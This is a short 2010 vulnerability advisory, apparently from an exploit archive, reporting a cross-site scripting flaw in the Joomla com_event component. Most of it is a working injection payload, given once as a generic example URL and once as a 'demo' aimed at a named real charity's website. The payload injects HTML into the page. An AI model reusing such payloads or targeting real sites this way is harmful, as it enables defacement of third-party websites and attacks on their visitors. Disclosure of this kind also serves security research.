Joomla Component com_event Cross Site Scripting Vulnerability

2010-05-16 09:04:00

[x] Joomla Component Event
[x] Date: 14/05/2010
[x] Author: s4r4d0
[x] Contact: [email protected]
[x] Team; Fatal Error
[x] Bug: XSS on Component Event
[x] Example: http://www.site.com/index.php?option=com_event=[XSS]
[x] Demo: http://www.breastcancercampaign.org/index.php?option=com_event=">><marquee><h1>XSS By Fatal Error</h1><marquee>
[x] Made in Brazil

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.